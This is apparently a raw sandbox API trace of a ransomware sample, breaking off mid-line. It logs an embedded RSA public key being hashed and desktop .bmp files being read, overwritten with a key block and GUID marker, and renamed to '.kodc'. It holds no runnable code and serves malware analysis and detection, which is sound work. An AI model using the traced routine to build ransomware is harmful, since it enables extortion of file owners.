RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0097.828] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.828] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.828] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693400) returned 1 [0097.829] CryptCreateHash (in: hProv=0x693400, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0097.829] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.829] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0097.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0097.829] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0097.829] GetLastError () returned 0x0 [0097.829] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0097.829] CryptReleaseContext (hProv=0x693400, dwFlags=0x0) returned 1 [0097.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0097.829] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0097.829] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0097.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.830] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0097.830] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9600) returned 0x9ba4d90 [0097.830] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.830] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0097.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0097.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0097.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x33400b0 [0097.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a6e8 [0097.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x33400f8 [0097.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a700 [0097.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a730 [0097.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0097.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a748 [0097.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0097.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0097.830] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0097.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0097.830] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a730 | out: hHeap=0x630000) returned 1 [0097.831] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a748 | out: hHeap=0x630000) returned 1 [0097.831] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0097.831] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0097.831] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0097.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0097.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0097.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a748 [0097.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0097.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a730 [0097.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0097.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0097.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0097.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0097.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0097.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0097.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0097.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0097.831] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0097.831] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a748 | out: hHeap=0x630000) returned 1 [0097.831] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.831] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a730 | out: hHeap=0x630000) returned 1 [0097.831] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0097.831] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0097.831] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0097.831] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0097.831] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0097.832] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0097.832] GetCurrentThreadId () returned 0x42c [0097.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0097.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x696338 [0097.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0097.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693400 [0097.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0097.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0097.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0097.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.832] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.832] GetCurrentThreadId () returned 0x42c [0097.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.832] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0097.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.832] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.832] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.832] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0097.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0097.832] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0097.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0097.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0097.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0097.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0097.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0097.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0097.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0097.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0097.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0097.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0097.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0097.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0097.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a730 [0097.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0097.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0097.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0097.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0097.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0097.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0097.833] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x95f5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.834] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0097.834] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0097.834] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.834] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0097.834] CloseHandle (hObject=0x5cc) returned 1 [0097.839] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pFReHiaBWQMkp8i.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pfrehiabwqmkp8i.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pFReHiaBWQMkp8i.bmp.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pfrehiabwqmkp8i.bmp.kodc")) returned 1 [0097.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0097.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.839] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0097.841] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcad1a340, ftCreationTime.dwHighDateTime=0x1d5b5a7, ftLastAccessTime.dwLowDateTime=0x859f8c30, ftLastAccessTime.dwHighDateTime=0x1d5c419, ftLastWriteTime.dwLowDateTime=0x859f8c30, ftLastWriteTime.dwHighDateTime=0x1d5c419, nFileSizeHigh=0x0, nFileSizeLow=0x17948, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PQdv.bmp", cAlternateFileName="")) returned 1 [0097.841] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PQdv.bmp") returned=".bmp" [0097.841] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PQdv.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pqdv.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0097.841] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=96584) returned 1 [0097.841] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0097.844] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x17922, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.844] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0097.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.845] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.845] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.845] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x17948, lpOverlapped=0x0) returned 1 [0097.846] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0097.846] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.846] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.846] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0097.847] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0097.847] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.847] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0097.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0097.847] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0097.847] GetLastError () returned 0x0 [0097.847] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0097.847] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0097.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0097.847] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0097.847] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0097.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.847] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0097.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x17950) returned 0x9ba4d90 [0097.848] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0097.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0097.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0097.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x33400f8 [0097.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a700 [0097.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x3340140 [0097.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a718 [0097.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a748 [0097.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0097.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a760 [0097.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0097.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0097.848] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0097.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0097.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a748 | out: hHeap=0x630000) returned 1 [0097.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a760 | out: hHeap=0x630000) returned 1 [0097.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0097.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0097.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0097.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0097.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0097.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a760 [0097.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0097.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a748 [0097.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0097.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0097.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0097.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0097.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0097.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0097.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0097.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0097.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0097.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a760 | out: hHeap=0x630000) returned 1 [0097.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0097.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a748 | out: hHeap=0x630000) returned 1 [0097.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0097.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0097.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0097.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0097.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0097.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0097.850] GetCurrentThreadId () returned 0x42c [0097.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0097.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x6963c8 [0097.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0097.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0097.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0097.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 